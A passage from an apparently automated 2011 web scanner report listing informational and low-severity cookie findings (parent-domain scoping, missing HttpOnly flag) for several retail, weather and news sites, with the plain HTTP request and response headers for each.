User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM?0&9/3/2011 6:29:35 PM?0&9/3/2011 6:30:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:30:12 GMT
Connection: close
Content-Length: 318870

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.61. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-business-gifts-PBIZGFT

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-business-gifts-PBIZGFT HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:37 PM?0&9/3/2011 6:20:23 PM?0&9/3/2011 6:20:48 PM?0&9/3/2011 6:20:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:45 GMT
Connection: close
Content-Length: 189636

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.62. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-christmas-gifts-PCHRBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-christmas-gifts-PCHRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:10 GMT
Connection: close
Content-Length: 418054

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.63. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-communion-gifts-PCOMMUN

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-communion-gifts-PCOMMUN HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:21:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:21:19 GMT
Connection: close
Content-Length: 259238

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.64. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-congratulations-gifts-PCONGRA

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-congratulations-gifts-PCONGRA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM?0&9/3/2011 6:19:52 PM?0&9/3/2011 6:19:56 PM?0&9/3/2011 6:20:33 PM?0&9/3/2011 6:20:09 PM?0&9/3/2011 6:21:18 PM?0&9/3/2011 6:21:00 PM?0&9/3/2011 6:20:59 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:59 GMT
Connection: close
Content-Length: 404968

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.65. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-graduation-gifts-PGRADUA

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-graduation-gifts-PGRADUA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM?0&9/3/2011 6:22:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:22:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:22:05 GMT
Connection: close
Content-Length: 351790

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.66. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-clothes-PHALAPP

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-halloween-clothes-PHALAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:20:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:14 GMT
Connection: close
Content-Length: 333277

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.67. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-gifts-PHALLOW

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-halloween-gifts-PHALLOW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:18:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:18:54 GMT
Connection: close
Content-Length: 211789

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.68. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-treat-bags-PHALBAG

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-halloween-treat-bags-PHALBAG HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:35 GMT
Connection: close
Content-Length: 110641

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.69. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-housewarming-gifts-PHOUSEW

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-housewarming-gifts-PHOUSEW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:21:26 PM?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:22:13 PM?0&9/3/2011 6:22:11 PM?0&9/3/2011 6:22:27 PM?0&9/3/2011 6:22:29 PM?0&9/3/2011 6:22:58 PM?0&9/3/2011 6:22:53 PM?0&9/3/2011 6:22:44 PM?0&9/3/2011 6:23:35 PM?0&9/3/2011 6:23:24 PM?0&9/3/2011 6:23:47 PM?0&9/3/2011 6:24:04 PM?0&9/3/2011 6:23:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:23:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:23:35 GMT
Connection: close
Content-Length: 319449

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.70. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-pet-gifts-PPETBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-pet-gifts-PPETBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:30 GMT
Connection: close
Content-Length: 268297

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.71. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-romantic-gifts-PLARBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-romantic-gifts-PLARBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:27 PM?0&9/3/2011 6:29:17 PM?0&9/3/2011 6:29:16 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:16 GMT
Connection: close
Content-Length: 310128

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.72. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /auto/sacbee/CA/Sacramento.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auto/sacbee/CA/Sacramento.html?threeday=1&width=316 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dottag.42=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:55 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 0.287
Set-Cookie: ASC=1315098655:2; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 1120


<html>
<head>
   <style type="text/css">
       body { font-family: Arial,Helvetica,sans-serif; font-size: 12px; }
       td { font-size: 12px; }
   </style>
</head>
<body>
       <div style="width: 316px;">
       <div cla
...[SNIP]...

12. Cookie without HttpOnly flag set
There are 79 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



12.1. http://content.usatoday.com/asp/uas3/uasSignedOut.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://content.usatoday.com
Path:   /asp/uas3/uasSignedOut.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /asp/uas3/uasSignedOut.htm HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; __qca=P0-1950655009-1315096993908; s_cc=true; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Ftopics; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQQQADDA=OIMLBDFBJFJKOFFOMKLADCDM; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:52:09 GMT
Content-Length: 388

<div class="uasPageElement uasSignedOut">
<span class="uasGreeting">Join USA TODAY &nbsp;</span>
<span class="uasPageControls">
<a class="uasSignIn" href="#SignIn">Sign in</a>
|
<
...[SNIP]...

12.2. http://trc.taboolasyndication.com/reuters/trc/2/json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /reuters/trc/2/json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

